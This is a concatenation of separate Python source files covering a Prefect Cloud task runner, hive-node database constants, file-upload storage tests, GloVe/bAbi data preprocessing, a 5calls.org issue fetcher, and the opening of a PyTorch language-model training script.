            (current) state, with the following signature: `state_handler(TaskRunner, old_state, new_state) -> State`;
            If multiple functions are passed, then the `new_state` argument will be the
            result of the previous handler.
        - result_handler (ResultHandler, optional): the handler to use for
            retrieving and storing state results during execution (if the Task doesn't already have one);
            if not provided here or by the Task, will default to the one specified in your config
    """

    def __init__(
        self,
        task: Task,
        state_handlers: Iterable[Callable] = None,
        result_handler: ResultHandler = None,
    ) -> None:
        # Client used for all Cloud API calls (state updates, heartbeats, cache queries).
        self.client = Client()
        super().__init__(
            task=task, state_handlers=state_handlers, result_handler=result_handler
        )

    def _heartbeat(self) -> None:
        """Send a single heartbeat for this task run; failures only warn, never raise."""
        try:
            task_run_id = self.task_run_id  # type: ignore
            self.client.update_task_run_heartbeat(task_run_id)  # type: ignore
        # BUG FIX: was a bare `except:`, which also swallows SystemExit and
        # KeyboardInterrupt; only ordinary errors should be suppressed here.
        except Exception:
            warnings.warn("Heartbeat failed for Task '{}'".format(self.task.name))

    def call_runner_target_handlers(self, old_state: State, new_state: State) -> State:
        """
        A special state handler that the TaskRunner uses to call its task's state handlers.
        This method is called as part of the base Runner's `handle_state_change()` method.
        Args:
            - old_state (State): the old (previous) state
            - new_state (State): the new (current) state
        Returns:
            - State: the new state
        """
        raise_on_exception = prefect.context.get("raise_on_exception", False)
        try:
            new_state = super().call_runner_target_handlers(
                old_state=old_state, new_state=new_state
            )
        except Exception as exc:
            msg = "Exception raised while calling state handlers: {}".format(repr(exc))
            self.logger.debug(msg)
            if raise_on_exception:
                raise exc
            new_state = Failed(msg, result=exc)
        task_run_id = prefect.context.get("task_run_id")
        version = prefect.context.get("task_run_version")
        try:
            # Strip anything Cloud should not receive before reporting the state.
            cloud_state = prepare_state_for_cloud(new_state)
            self.client.set_task_run_state(
                task_run_id=task_run_id,
                version=version,
                state=cloud_state,
                cache_for=self.task.cache_for,
            )
        except Exception as exc:
            self.logger.debug(
                "Failed to set task state with error: {}".format(repr(exc))
            )
            # If Cloud can't record the state, end this run with the state we computed.
            raise ENDRUN(state=new_state)
        if version is not None:
            # Keep the local version counter in lockstep with Cloud's optimistic locking.
            prefect.context.update(task_run_version=version + 1)  # type: ignore
        return new_state

    def initialize_run(  # type: ignore
        self, state: Optional[State], context: Dict[str, Any]
    ) -> TaskRunnerInitializeResult:
        """
        Initializes the Task run by initializing state and context appropriately.
        Args:
            - state (Optional[State]): the initial state of the run
            - context (Dict[str, Any]): the context to be updated with relevant information
        Returns:
            - tuple: a tuple of the updated state, context, and upstream_states objects
        """
        # if the map_index is not None, this is a dynamic task and we need to load
        # task run info for it
        map_index = context.get("map_index")
        if map_index not in [-1, None]:
            try:
                task_run_info = self.client.get_task_run_info(
                    flow_run_id=context.get("flow_run_id", ""),
                    task_id=self.task.id,
                    map_index=map_index,
                )
                # if state was provided, keep it; otherwise use the one from db
                state = state or task_run_info.state  # type: ignore
                context.update(
                    task_run_version=task_run_info.version,  # type: ignore
                    task_run_id=task_run_info.id,  # type: ignore
                )
            except Exception as exc:
                self.logger.debug(
                    "Failed to retrieve task state with error: {}".format(repr(exc))
                )
                if state is None:
                    state = Failed(
                        message="Could not retrieve state from Prefect Cloud",
                        result=exc,
                    )
                raise ENDRUN(state=state)
        # we assign this so it can be shared with heartbeat thread
        self.task_run_id = context.get("task_run_id")  # type: ignore
        context.update(cloud=True)
        return super().initialize_run(state=state, context=context)

    @call_state_handlers
    def check_task_is_cached(self, state: State, inputs: Dict[str, Result]) -> State:
        """
        Checks if task is cached in the DB and whether any of the caches are still valid.
        Args:
            - state (State): the current state of this task
            - inputs (Dict[str, Result]): a dictionary of inputs whose keys correspond
                to the task's `run()` arguments.
        Returns:
            - State: the state of the task after running the check
        Raises:
            - ENDRUN: if the task is not ready to run
        """
        if self.task.cache_for is not None:
            oldest_valid_cache = datetime.datetime.utcnow() - self.task.cache_for
            cached_states = self.client.get_latest_cached_states(
                task_id=self.task.id, created_after=oldest_valid_cache
            )
            if not cached_states:
                self.logger.debug(
                    "Task '{name}': can't use cache because no Cached states were found".format(
                        name=prefect.context.get("task_full_name", self.task.name)
                    )
                )
            else:
                self.logger.debug(
                    "Task '{name}': {num} candidate cached states were found".format(
                        name=prefect.context.get("task_full_name", self.task.name),
                        num=len(cached_states),
                    )
                )
                # Return the first candidate that passes the task's cache validator.
                for candidate_state in cached_states:
                    assert isinstance(candidate_state, Cached)  # mypy assert
                    if self.task.cache_validator(
                        candidate_state, inputs, prefect.context.get("parameters")
                    ):
                        candidate_state._result = candidate_state._result.to_result()
                        return candidate_state
                self.logger.debug(
                    "Task '{name}': can't use cache because no candidate Cached states "
                    "were valid".format(
                        name=prefect.context.get("task_full_name", self.task.name)
                    )
                )
        return state
|
# constants of db start
# NOTE: the string values below are persisted MongoDB collection/field names --
# they must never be renamed without a data migration.
DID_INFO_DB_NAME = "hive_manage_info"
DID_INFO_REGISTER_COL = "auth_register"
# Fields of the auth_register collection.
USER_DID = "userDid"  # compatible with v1
APP_ID = "appDid"
APP_INSTANCE_DID = "appInstanceDid"
DID_INFO_NONCE = "nonce"
DID_INFO_TOKEN = "token"
DID_INFO_NONCE_EXPIRED = "nonce_expired"
DID_INFO_TOKEN_EXPIRED = "token_expired"
# Fields of the did_sync_info collection.
DID_SYNC_INFO_COL = "did_sync_info"
DID_SYNC_INFO_STATE = "state"
DID_SYNC_INFO_MSG = "msg"
DID_SYNC_INFO_TIME = "time"
DID_SYNC_INFO_DRIVE = "drive"
# Fields of the vault_backup_info collection.
VAULT_BACKUP_INFO_COL = "vault_backup_info"
VAULT_BACKUP_INFO_TYPE = "type"
VAULT_BACKUP_INFO_STATE = "state"
VAULT_BACKUP_INFO_MSG = "msg"
VAULT_BACKUP_INFO_TIME = "time"
VAULT_BACKUP_INFO_DRIVE = "drive"
VAULT_BACKUP_INFO_TOKEN = "token"
# Allowed values of VAULT_BACKUP_INFO_TYPE.
VAULT_BACKUP_INFO_TYPE_GOOGLE_DRIVE = "google_drive"
VAULT_BACKUP_INFO_TYPE_HIVE_NODE = "hive_node"
# Fields of the vault_orders collection.
VAULT_ORDER_COL = "vault_orders"
# VAULT_ORDER_DID = "did"
VAULT_ORDER_APP_ID = "app_id"
VAULT_ORDER_PACKAGE_INFO = "pricing_info"
VAULT_ORDER_TXIDS = "pay_txids"
VAULT_ORDER_STATE = "state"
VAULT_ORDER_TYPE = "type"
# NOTE(review): "creat_time" looks like a typo of "create_time", but it is a
# stored field name -- kept as-is for backward compatibility.
VAULT_ORDER_CREATE_TIME = "creat_time"
VAULT_ORDER_PAY_TIME = "pay_time"
VAULT_ORDER_MODIFY_TIME = "modify_time"
# Fields of the vault_service collection.
VAULT_SERVICE_COL = "vault_service"
VAULT_SERVICE_DID = "did"  # compatible with v1
VAULT_SERVICE_MAX_STORAGE = "max_storage"
VAULT_SERVICE_FILE_USE_STORAGE = "file_use_storage"
VAULT_SERVICE_DB_USE_STORAGE = "db_use_storage"
VAULT_SERVICE_MODIFY_TIME = "modify_time"
VAULT_SERVICE_START_TIME = "start_time"
VAULT_SERVICE_END_TIME = "end_time"
VAULT_SERVICE_PRICING_USING = "pricing_using"
VAULT_SERVICE_STATE = "state"
# constants of db end
# Fields of the vault_backup_service collection.
VAULT_BACKUP_SERVICE_COL = "vault_backup_service"
VAULT_BACKUP_SERVICE_DID = "did"  # only for v1
VAULT_BACKUP_SERVICE_MAX_STORAGE = "max_storage"
VAULT_BACKUP_SERVICE_USE_STORAGE = "use_storage"
VAULT_BACKUP_SERVICE_MODIFY_TIME = "modify_time"
VAULT_BACKUP_SERVICE_START_TIME = "start_time"
VAULT_BACKUP_SERVICE_END_TIME = "end_time"
VAULT_BACKUP_SERVICE_USING = "backup_using"
VAULT_BACKUP_SERVICE_STATE = "state"
# scripting begin
SCRIPTING_SCRIPT_COLLECTION = "scripts"
SCRIPTING_SCRIPT_TEMP_TX_COLLECTION = "scripts_temptx"
# Condition types usable in script definitions.
SCRIPTING_CONDITION_TYPE_QUERY_HAS_RESULTS = "queryHasResults"
SCRIPTING_CONDITION_TYPE_AND = "and"
SCRIPTING_CONDITION_TYPE_OR = "or"
# Executable types usable in script definitions.
SCRIPTING_EXECUTABLE_TYPE_AGGREGATED = "aggregated"
SCRIPTING_EXECUTABLE_TYPE_FIND = "find"
SCRIPTING_EXECUTABLE_TYPE_INSERT = "insert"
SCRIPTING_EXECUTABLE_TYPE_UPDATE = "update"
SCRIPTING_EXECUTABLE_TYPE_DELETE = "delete"
SCRIPTING_EXECUTABLE_TYPE_FILE_UPLOAD = "fileUpload"
SCRIPTING_EXECUTABLE_TYPE_FILE_DOWNLOAD = "fileDownload"
SCRIPTING_EXECUTABLE_TYPE_FILE_PROPERTIES = "fileProperties"
SCRIPTING_EXECUTABLE_TYPE_FILE_HASH = "fileHash"
# Placeholder tokens substituted when a script executes.
SCRIPTING_EXECUTABLE_CALLER_DID = "$caller_did"
SCRIPTING_EXECUTABLE_CALLER_APP_DID = "$caller_app_did"
SCRIPTING_EXECUTABLE_PARAMS = "$params"
SCRIPTING_EXECUTABLE_DOWNLOADABLE = "_downloadable"
# scripting end
# pubsub start
PUB_CHANNEL_COLLECTION = "pub_channel_col"
PUB_CHANNEL_ID = "channel_id"
PUB_CHANNEL_PUB_DID = "pub_did"
PUB_CHANNEL_PUB_APPID = "pub_appid"
PUB_CHANNEL_NAME = "channel_name"
PUB_CHANNEL_SUB_DID = "sub_did"
PUB_CHANNEL_SUB_APPID = "sub_appid"
PUB_CHANNEL_MODIFY_TIME = "modify_time"
SUB_MESSAGE_COLLECTION = "sub_message_col"
SUB_MESSAGE_SUBSCRIBE_ID = "subscribe_id"
SUB_MESSAGE_PUB_DID = "pub_did"
SUB_MESSAGE_PUB_APPID = "pub_appid"
SUB_MESSAGE_CHANNEL_NAME = "channel_name"
SUB_MESSAGE_SUB_DID = "sub_did"
SUB_MESSAGE_SUB_APPID = "sub_appid"
SUB_MESSAGE_DATA = "message_data"
SUB_MESSAGE_TIME = "message_time"
SUB_MESSAGE_MODIFY_TIME = "modify_time"
# pubsub end
# other
# Access-scope identifiers used by permission checks.
VAULT_ACCESS_WR = "vault_write_read"
VAULT_ACCESS_R = "vault_read"
VAULT_ACCESS_DEL = "vault_delete"
VAULT_STORAGE_DB = "vault_db"
VAULT_STORAGE_FILE = "vault_file"
BACKUP_ACCESS = "backup_access"
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
DID_AUTH_SUBJECT = "didauth"
DID_AUTH_REALM = "elastos_hive_node"
# Runtime modes of the hive node.
HIVE_MODE_DEV = "dev"
HIVE_MODE_PROD = "prod"
HIVE_MODE_TEST = "test"
# Internal node-to-node backup API endpoints.
INTER_BACKUP_SERVICE_URL = '/api/v1/inter/backup/service'
INTER_BACKUP_SAVE_FINISH_URL = '/api/v1/inter/backup/save_finish'
INTER_BACKUP_RESTORE_FINISH_URL = '/api/v1/inter/backup/restore_finish'
INTER_BACKUP_FILE_LIST_URL = '/api/v1/inter/backup/file_list'
INTER_BACKUP_FILE_URL = '/api/v1/inter/backup/file'
INTER_BACKUP_MOVE_FILE_URL = '/api/v1/inter/backup/move'
INTER_BACKUP_COPY_FILE_URL = '/api/v1/inter/backup/copy'
INTER_BACKUP_PATCH_HASH_URL = '/api/v1/inter/backup/patch/hash'
INTER_BACKUP_PATCH_DELTA_URL = '/api/v1/inter/backup/patch/delta'
INTER_BACKUP_GENE_DELTA_URL = '/api/v1/inter/backup/gene/delta'
# Transfer chunk size in bytes.
CHUNK_SIZE = 4096
|
<gh_stars>0
from kw_tests.common_class import CommonTestClass
from kw_tests.support import Files, Dirs, DataRam, InfoRam
from kw_upload.data_storage import VolumeBasic
from kw_upload.data_storage import AStorage as DataStorage
from kw_upload.uploader.essentials import Calculates, Hashed, TargetSearch
from kw_upload.exceptions import UploadException
from kw_upload.uploader.translations import Translations
class ADataStorageTest(CommonTestClass):
    """Base fixture for data-storage tests; removes the mock target on teardown."""

    def tearDown(self):
        # A test may leave behind either a file or a directory at the mock path.
        target = self._mock_test_file()
        if Files.is_file(target):
            Files.unlink(target)
        if Dirs.is_dir(target):
            Dirs.rmdir(target)
        super().tearDown()

    def _mock_storage(self) -> DataStorage:
        """Volume-backed storage instance with default translations."""
        return VolumeBasic(Translations())
class VolumeTest(ADataStorageTest):
    """Exercises volume storage: the happy path and each failure mode."""

    def test_thru(self):
        """Write, read, truncate and remove a part file end-to-end."""
        file = self._mock_test_file()
        storage = self._mock_storage()
        storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz')
        assert b'abcdefghijklmnopqrstuvwxyz' == storage.get_part(file, 0)
        storage.truncate(file, 16)
        assert b'abcdefghijklmnop' == storage.get_part(file, 0)
        storage.remove(file)
        assert not Files.is_file(file)

    def test_unreadable(self):
        """Writing where a directory occupies the target path must fail."""
        file = self._mock_test_file()
        storage = self._mock_storage()
        Dirs.mkdir(file)
        try:
            storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz')  # fail
            assert False, 'Accessing unreadable!'
        except UploadException as ex:
            assert 'CANNOT OPEN FILE' == ex.get_message()
        finally:
            # Clean up the blocking directory even if the assertion fails.
            Dirs.rmdir(file)

    def test_unreadable_seek(self):
        """Seek-write where a directory occupies the target path must fail."""
        file = self._mock_test_file()
        storage = self._mock_storage()
        Dirs.mkdir(file)
        try:
            storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz', 10)  # fail
            assert False, 'Accessing unreadable!'
        except UploadException as ex:
            assert 'CANNOT OPEN FILE' == ex.get_message()
        finally:
            Dirs.rmdir(file)

    def test_unwriteable(self):
        """Writing to a read-only (0444) file must fail."""
        file = self._mock_test_file()
        storage = self._mock_storage()
        storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz')
        Files.chmod(file, 0o444)
        try:
            storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz')  # fail
            assert False, 'Writing to locked file!'
        except UploadException as ex:
            assert 'CANNOT WRITE FILE' == ex.get_message()
        finally:
            # Restore write permission before removal, or cleanup would fail too.
            Files.chmod(file, 0o666)
            storage.remove(self._mock_test_file())

    def test_unwriteable_seek(self):
        """Seek-writing past the end of a read-only file must fail."""
        file = self._mock_test_file()
        storage = self._mock_storage()
        storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz', 0)
        Files.chmod(file, 0o444)
        try:
            storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz', 26)  # fail
            assert False, 'Writing to non-available seek in file!'
        except UploadException as ex:
            assert 'CANNOT WRITE FILE' == ex.get_message()
        finally:
            Files.chmod(file, 0o666)
            storage.remove(self._mock_test_file())

    def test_deleted(self):
        """Removing a file twice must fail on the second attempt."""
        file = self._mock_test_file()
        storage = self._mock_storage()
        assert not storage.exists(file)
        storage.add_part(file, b'abcdefghijklmnopqrstuvwxyz', 0)
        assert storage.exists(file)
        try:
            storage.remove(file)
            storage.remove(file)  # fail
            assert False, 'Deleting non-existent file!'
        except UploadException as ex:
            assert 'CANNOT REMOVE DATA' == ex.get_message()
class TargetTest(CommonTestClass):
    """Exercises TargetSearch validation and target-name resolution."""

    def test_fail_no_remote(self):
        """process() without a remote file name must fail."""
        lang = Translations()
        lib = TargetSearch(lang, InfoRam(lang), DataRam(lang))
        try:
            lib.process()
            assert False, 'No remote and passed'
        except UploadException as ex:
            assert 'SENT FILE NAME IS EMPTY' == ex.get_message()

    def test_fail_no_target(self):
        """process() without a target directory must fail."""
        lang = Translations()
        lib = TargetSearch(lang, InfoRam(lang), DataRam(lang))
        lib.set_remote_file_name('abcdefg')
        try:
            lib.process()
            assert False, 'No target and passed'
        except UploadException as ex:
            assert 'TARGET DIR IS NOT SET' == ex.get_message()

    def test_fail_no_base(self):
        """get_final_target_name() before process() must fail."""
        lang = Translations()
        lib = TargetSearch(lang, InfoRam(lang), DataRam(lang))
        try:
            lib.get_final_target_name()
            assert False, 'No final target name and passed'
        except UploadException as ex:
            assert 'UPLOAD FILE NAME IS EMPTY' == ex.get_message()

    def test_process_clear(self):
        """With name-clearing enabled, unsafe characters are stripped/replaced."""
        lang = Translations()
        lib = TargetSearch(lang, InfoRam(lang), DataRam(lang))
        lib.set_target_dir(self._get_test_dir()).set_remote_file_name('what can be found$.here').process()
        assert 'what_can_be_found.here' == lib.get_final_target_name()
        assert self._get_test_dir() + 'what_can_be_found' + TargetSearch.FILE_DRIVER_SUFF == lib.get_driver_location()
        assert self._get_test_dir() + 'what_can_be_found.here' + TargetSearch.FILE_UPLOAD_SUFF == lib.get_temporary_target_location()

    def test_process_no_clear(self):
        """With clearing disabled (flags False), the remote name is used verbatim."""
        lang = Translations()
        lib = TargetSearch(lang, InfoRam(lang), DataRam(lang), False, False)
        lib.set_target_dir(self._get_test_dir()).set_remote_file_name('what el$e can be found').process()
        assert 'what el$e can be found' == lib.get_final_target_name()
        assert self._get_test_dir() + 'what el$e can be found' + TargetSearch.FILE_DRIVER_SUFF == lib.get_driver_location()
        assert self._get_test_dir() + 'what el$e can be found' + TargetSearch.FILE_UPLOAD_SUFF == lib.get_temporary_target_location()

    def test_process_name_lookup(self):
        """Existing files force a numbered free-name lookup (.3 is first free here)."""
        lang = Translations()
        data_ram = DataRam(lang)
        data_ram.add_part(self._get_test_dir() + 'dummyFile.tst', 'asdfghjklqwertzuiopyxcvbnm')
        data_ram.add_part(self._get_test_dir() + 'dummyFile.0.tst', 'asdfghjklqwertzuiopyxcvbnm')
        data_ram.add_part(self._get_test_dir() + 'dummyFile.1.tst', 'asdfghjklqwertzuiopyxcvbnm')
        data_ram.add_part(self._get_test_dir() + 'dummyFile.2.tst', 'asdfghjklqwertzuiopyxcvbnm')
        lib = TargetSearch(lang, InfoRam(lang), data_ram, False, False)
        lib.set_target_dir(self._get_test_dir()).set_remote_file_name('dummyFile.tst').process()
        assert self._get_test_dir() + 'dummyFile.3.tst' + TargetSearch.FILE_UPLOAD_SUFF == lib.get_temporary_target_location()
|
<gh_stars>0
# coding: utf-8
# In[1]:
# BUG FIX: `from __future__ import ...` must be the first statement of the
# module (only comments/docstring may precede it); having it after
# `import numpy` is a SyntaxError on Python 2, which this script targets
# (print statements / xrange below).
from __future__ import division
import numpy as np

# Pre-trained GloVe embedding file: 100-dimensional vectors, 6B-token corpus.
filename = 'glove.6B.100d.txt'
def loadEmbeddings(filename):
    """Load a GloVe-style text embedding file.

    Each line is expected to be space-separated: <word> <v1> <v2> ... <vN>.

    Args:
        filename: path to the embedding file.

    Returns:
        (vocab, embd): vocab is the list of words; embd is the parallel list
        of vectors, each a list of number strings (converted by the caller).
    """
    vocab = []
    embd = []
    # Context manager guarantees the handle is closed even if parsing raises
    # (the original relied on an explicit close after the loop).
    with open(filename, 'r') as file:
        for line in file.readlines():
            row = line.strip().split(' ')
            vocab.append(row[0])
            embd.append(row[1:])
    print('Loaded!')
    return vocab, embd
# Build the vocabulary and the embedding matrix from the GloVe file.
vocab,embd = loadEmbeddings(filename)
word_vec_dim = len(embd[0])
# Special tokens reuse existing 'unk'/'eos' vectors plus a small offset so they
# stay distinct but live in a sensible region of the embedding space.
# NOTE(review): assumes 'unk' and 'eos' exist in the GloVe vocabulary --
# vocab.index() raises ValueError otherwise; confirm for other embedding files.
vocab.append('<UNK>')
embd.append(np.asarray(embd[vocab.index('unk')],np.float32)+0.01)
vocab.append('<EOS>')
embd.append(np.asarray(embd[vocab.index('eos')],np.float32)+0.01)
# <PAD> is the all-zeros vector.
vocab.append('<PAD>')
embd.append(np.zeros((word_vec_dim),np.float32))
embedding = np.asarray(embd)
embedding = embedding.astype(np.float32)
# In[2]:
def word2vec(word):
    """Map a word to its embedding vector; unknown words fall back to <UNK>."""
    lookup = word if word in vocab else '<UNK>'
    return embedding[vocab.index(lookup)]
def most_similar_eucli(x):
    """Return vocab indices sorted by Euclidean distance of their vectors to x."""
    diff = np.subtract(embedding, x)
    dists = np.sqrt(np.sum(np.square(diff), 1))
    return np.argsort(dists)
# Demo: the ten nearest neighbours of 'frog' by Euclidean distance.
# (Python 2 syntax: print statements and xrange.)
word = 'frog'
most_similars = most_similar_eucli(word2vec(word))
print "TOP TEN MOST SIMILAR WORDS TO '"+str(word)+"':\n"
for i in xrange(0,10):
    print str(i+1)+". "+str(vocab[most_similars[i]])
def vec2word(vec):
    """Map a vector back to the nearest vocabulary word (Euclidean distance)."""
    nearest = most_similar_eucli(np.asarray(vec, np.float32))
    return vocab[nearest[0]]
# In[3]:
import string
# Data related to basic induction training and testing from QA bAbi tasks dataset will be used.
# (https://research.fb.com/downloads/babi/)
filename = 'qa16_basic-induction_train.txt'
# NOTE(review): these three accumulators appear unused at module level --
# extract_info() defines its own locals with the same names.
fact_story = []
question = []
answer = []
# Running maxima, threaded through both extract_info() calls (train then test).
max_fact_len = 0
max_question_len = 0
def extract_info(filename,max_fact_len,max_question_len):
    """Parse a bAbi task file into stories, questions and answers.

    Lines containing '?' are tab-separated question/answer lines and also
    terminate the current story; all other lines are facts. Words are mapped
    to embedding vectors via word2vec(); answers to vocab indices.

    NOTE(review): Python-2-only idioms -- str.translate(None, ...) and
    list-returning map() do not work under Python 3.

    Returns:
        (fact_stories, questions, answers, max_fact_len, max_question_len)
        with the two maxima updated across this file's contents.
    """
    fact_story = []
    fact_stories = []
    questions = []
    answers = []
    file = open(filename,'r')
    for line in file.readlines():
        flag_end_story = 0
        line = line.lower()
        if '?' in line:
            #q for question, a for answer.
            flag_end_story=1
            qa = line.strip().split('\t')
            q = qa[0]
            a = qa[1]
            q = q.translate(None, string.punctuation)
            a = a.translate(None, string.punctuation)
            q = q.strip().split(' ')
            a = a.strip().split(' ')
            q = q[1:]  # drop the leading bAbi line number
            q = map(word2vec,q)
            questions.append(q)
            if len(q)>max_question_len:
                max_question_len = len(q)
            answers.append(map(vocab.index,a))
        else:
            line = line.translate(None, string.punctuation)
            fact = line.strip().split(' ')
            fact = fact[1:]  # drop the leading bAbi line number
            fact = map(word2vec,fact)
            fact_story.append(fact)
            if len(fact)>max_fact_len:
                max_fact_len=len(fact)
        if flag_end_story == 1:
            fact_stories.append(fact_story)
            fact_story = []
    file.close()
    return fact_stories,questions,answers,max_fact_len,max_question_len
# Parse the train file, then the test file (maxima accumulate across both).
fact_stories,questions,answers,max_fact_len,max_question_len = extract_info(filename,max_fact_len,max_question_len)
filename = 'qa16_basic-induction_test.txt'
test_fact_stories,test_questions,test_answers,max_fact_len,max_question_len = extract_info(filename,max_fact_len,max_question_len)
# In[4]:
print max_fact_len
print max_question_len
# In[5]:
print map(vec2word,fact_stories[0][0])
# In[6]:
print map(vec2word,test_fact_stories[0][0])
# In[7]:
# Pad every question and fact (train set) to the global maxima with <PAD>.
PAD = word2vec('<PAD>')
for i in xrange(0,len(questions)):
    questions_len = len(questions[i])
    for j in xrange(questions_len,max_question_len):
        questions[i].append(PAD)
    for j in xrange(0,len(fact_stories[i])):
        fact_len = len(fact_stories[i][j])
        for k in xrange(fact_len,max_fact_len):
            fact_stories[i][j].append(PAD)
# In[8]:
print map(vec2word,fact_stories[0][2])
# In[9]:
# Same padding for the test set.
for i in xrange(0,len(test_questions)):
    questions_len = len(test_questions[i])
    for j in xrange(questions_len,max_question_len):
        test_questions[i].append(PAD)
    for j in xrange(0,len(test_fact_stories[i])):
        fact_len = len(test_fact_stories[i][j])
        for k in xrange(fact_len,max_fact_len):
            test_fact_stories[i][j].append(PAD)
# In[10]:
print map(vec2word,test_fact_stories[0][3])
# In[11]:
# Convert the padded nested lists into dense numpy arrays.
fact_stories = np.asarray(fact_stories,np.float32)
print fact_stories.shape
questions = np.asarray(questions,np.float32)
print questions.shape
answers = np.asarray(answers,np.int32)
print answers.shape
test_fact_stories = np.asarray(test_fact_stories,np.float32)
print test_fact_stories.shape
test_questions = np.asarray(test_questions,np.float32)
print test_questions.shape
test_answers = np.asarray(test_answers,np.int32)
print test_answers.shape
# In[12]:
#Saving processed data in another file.
import pickle
PICK = [fact_stories,questions,answers,test_fact_stories,test_questions,test_answers]
with open('embeddingPICKLE', 'wb') as fp:
    pickle.dump(PICK, fp)
|
<reponame>foozmeat/hotline<gh_stars>1-10
import json
from pathlib import Path
import requests
from fivecalls.networking import http_get_json
from fivecalls.singleton import Singleton
class FiveCallsModel:
    """Base model class: adopts arbitrary keyword arguments as attributes."""

    def __init__(self, **kwargs):
        if kwargs:
            for key, val in kwargs.items():
                setattr(self, key, val)

    def __str__(self):
        """ Returns a string representation of the model. By default
        this is the same as AsJsonString(). """
        return self.AsJsonString()

    def AsJsonString(self) -> str:
        """ Returns the model as a JSON string built from the instance's
        __dict__ key/value pairs. """
        return json.dumps(self.__dict__, sort_keys=True)
class Issue(FiveCallsModel):
    """A single 5calls issue with its script, categories and contacts."""

    def __init__(self, **kwargs):
        # Defaults below are overwritten by matching keys in kwargs
        # (applied via setattr in FiveCallsModel.__init__).
        self.id: str = None
        self.name: str = None
        self.script: str = None
        self.reason: str = None
        self.categories: [dict] = []
        self.contacts: [dict] = []
        # Issues default to inactive until the API data says otherwise.
        self.inactive: bool = True
        self.link: str = None
        self.linkTitle: str = None
        self.slug: str = None
        super().__init__(**kwargs)

    def __str__(self):
        return f"({self.id}) {self.name}"
# class Category(FiveCallsModel):
#
# def __init__(self, **kwargs):
# self.name: str = None
# self.issues: [Issue] = []
#
# super().__init__(**kwargs)
# class Contact(FiveCallsModel):
#
# def __init__(self, **kwargs):
# self.id: str = None
# self.name: str = None
# self.phone: str = None
# self.photoURL: str = None
# self.party: str = None
# self.state: str = None
# self.reason = None
# self.area = None
# self.field_offices: [dict] = []
#
# super().__init__(**kwargs)
# Local cache layout: downloaded contact photos plus the raw issues JSON.
DATA_PATH = 'data/'
IMAGE_PATH = DATA_PATH + 'images/'
JSON_PATH = DATA_PATH + 'fivecalls.json'
class FiveCallsData(metaclass=Singleton):
    """Singleton cache of 5calls.org issues.

    Loads JSON_PATH (fetching it from the API first if missing) and indexes
    issues by category and contacts by id.
    """

    def __init__(self):
        self.issues = []
        self.active_issues = []
        self.categories = {}
        self.contacts = {}
        self.global_count = 0
        # First run: populate the local JSON cache from the API.
        if not Path(JSON_PATH).exists():
            self.fetch()
        with open(JSON_PATH, 'r') as fp:
            self._data = json.load(fp)
        for i in self._data['issues']:
            new_issue = Issue(**i)
            if not new_issue.inactive:
                self.active_issues.append(new_issue)
            # Group issues under each category name they belong to.
            for c in i['categories']:
                existing_category = self.categories.get(c['name'], None)
                if not existing_category:
                    self.categories[c['name']] = []
                self.categories[c['name']].append(new_issue)
            # Contacts shared across issues are keyed by id (last writer wins).
            for c in i['contacts']:
                self.contacts[c['id']] = c
            self.issues.append(new_issue)
        self.global_count = self._data['global_count']

    def fetch(self) -> bool:
        """Download the issue list (and contact photos) into the local cache.

        Returns:
            True when the JSON cache was written, False on any HTTP failure.
        """
        data = http_get_json(
            "https://5calls.org/issues/",
            params={
                "all": "true",
                "address": "97211",
            },
        )
        if not data:
            return False
        for i in data['issues']:
            for contact in i['contacts']:
                path = IMAGE_PATH + contact['id'] + '.jpg'
                # Only download photos we don't already have.
                if not Path(path).exists() and contact['photoURL']:
                    try:
                        response = requests.get(contact['photoURL'])
                    except requests.exceptions.RequestException:
                        print('HTTP Request failed')
                        return False
                    else:
                        if response.ok:
                            with open(path, 'wb') as f:
                                f.write(response.content)
        count_data = http_get_json(
            "https://5calls.org/report/",
            params={},
        )
        # BUG FIX: http_get_json can return a falsy value on failure (see the
        # `if not data` guard above) -- don't index into it blindly.
        data['global_count'] = int(count_data['count']) if count_data else 0
        with open(JSON_PATH, 'w') as fp:
            json.dump(data, fp)
        return True
if __name__ == '__main__':
    # Smoke test: instantiate the cache, force a fetch, report index sizes.
    fcd = FiveCallsData()
    if fcd.fetch():
        print(f"issues: {len(fcd.issues)}")
        print(f"active issues: {len(fcd.active_issues)}")
        print(f"categories: {len(fcd.categories)}")
|
import argparse
import time
import math
import torch
import torch.nn as nn
import torch.optim as optim
import data
# Command-line configuration for the language-model training run.
parser = argparse.ArgumentParser(description='PyTorch Language Modeling')
parser.add_argument('--data', type=str, default='penn',
                    help='data corpus (penn, wikitext-2, wikitext-103)')
parser.add_argument('--model', type=str, default='DNC',
                    help='type of recurrent net (LSTM, Transformer, DNC)')
parser.add_argument('--emsize', type=int, default=50,
                    help='size of word embeddings')
parser.add_argument('--nhid', type=int, default=200,
                    help='number of hidden units per layer')
parser.add_argument('--nlayers', type=int, default=2,
                    help='number of layers')
parser.add_argument('--lr', type=float, default=20,
                    help='initial learning rate')
parser.add_argument('--clip', type=float, default=0.25,
                    help='gradient clipping')
parser.add_argument('--epochs', type=int, default=40,
                    help='upper epoch limit')
parser.add_argument('--batch_size', type=int, default=20, metavar='N',
                    help='batch size')
parser.add_argument('--bptt', type=int, default=35,
                    help='sequence length')
parser.add_argument('--dropout', type=float, default=0.2,
                    help='dropout applied to layers (0 = no dropout)')
parser.add_argument('--tied', action='store_true',
                    help='tie the word embedding and softmax weights')
parser.add_argument('--seed', type=int, default=1111,
                    help='random seed')
parser.add_argument('--cuda', action='store_true',
                    help='use CUDA')
parser.add_argument('--log-interval', type=int, default=200, metavar='N',
                    help='report interval')
parser.add_argument('--nhead', type=int, default=2,
                    help='the number of heads in the encoder/decoder of the transformer model')
args = parser.parse_args()
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
device = torch.device("cuda" if args.cuda else "cpu")
# Checkpoint path is derived from corpus + model names, e.g. ./res/penn_DNC.pt
name = args.data + '_' + args.model
path = './res/' + name + '.pt'
###############################################################################
# Load data
###############################################################################
corpus = data.Corpus('./data/' + args.data)
# Starting from sequential data, batchify arranges the dataset into columns.
# For instance, with the alphabet as the sequence and batch size 4, we'd get
# ┌ a g m s ┐
# │ b h n t │
# │ c i o u │
# │ d j p v │
# │ e k q w │
